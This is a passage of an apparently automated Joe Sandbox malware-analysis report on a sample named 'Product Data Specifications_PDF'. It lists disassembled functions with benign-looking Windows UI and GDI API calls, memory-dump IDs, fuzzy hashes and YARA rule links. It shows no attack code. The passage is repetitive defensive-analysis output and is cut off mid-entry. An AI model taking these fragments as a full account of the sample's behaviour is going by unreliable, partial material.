                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Copy$AllocClearErrorLastString
                              • String ID:
                              • API String ID: 960795272-0
                              • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                              • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                              Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                              Download Yara Rule
                              APIs
                              • BeginPaint.USER32(00000000,?), ref: 00447BDF
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 4189319755-0
                              • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                              • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                              • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                              • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                              Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                              • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                              • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                              • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                              • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow$InvalidateRect
                              • String ID:
                              • API String ID: 1976402638-0
                              • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                              • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                              Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                              Download Yara Rule
                              APIs
                              • ShowWindow.USER32(?,00000000), ref: 00440A8A
                              • EnableWindow.USER32(?,00000000), ref: 00440AAF
                              • ShowWindow.USER32(?,00000000), ref: 00440B18
                              • ShowWindow.USER32(?,00000004), ref: 00440B2B
                              • EnableWindow.USER32(?,00000001), ref: 00440B50
                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Show$Enable$MessageSend
                              • String ID:
                              • API String ID: 642888154-0
                              • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                              • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                              Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$MessageSend
                              • String ID:
                              • API String ID: 1871949834-0
                              • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                              • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                              Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                              • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                              Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                              Download Yara Rule
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                              • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                              • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                              • SendMessageW.USER32 ref: 00471AE3
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 3611059338-0
                              • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                              • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                              Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DestroyWindow$DeleteObject$IconMove
                              • String ID:
                              • API String ID: 1640429340-0
                              • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                              • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                              Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcslen.LIBCMT ref: 004438CD
                              • _wcslen.LIBCMT ref: 004438E6
                              • _wcstok.LIBCMT ref: 004438F8
                              • _wcslen.LIBCMT ref: 0044390C
                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                              • _wcstok.LIBCMT ref: 00443931
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                              • String ID:
                              • API String ID: 3632110297-0
                              • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                              • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                              Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteMenuObject$IconWindow
                              • String ID:
                              • API String ID: 752480666-0
                              • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                              • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                              Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                              • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                              Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                              • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                              Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: PerformanceQuery$CounterSleep$Frequency
                              • String ID:
                              • API String ID: 2833360925-0
                              • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                              • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                              Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32 ref: 004555C7
                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                              • String ID:
                              • API String ID: 3691411573-0
                              • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                              • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                              • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                              • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                              Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                              • LineTo.GDI32(?,?,?), ref: 004472AC
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                              • LineTo.GDI32(?,?,?), ref: 004472C6
                              • EndPath.GDI32(?), ref: 004472D6
                              • StrokePath.GDI32(?), ref: 004472E4
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                              • String ID:
                              • API String ID: 372113273-0
                              • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                              • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                              • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                              • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                              Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              • GetDC.USER32(00000000), ref: 0044CC6D
                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
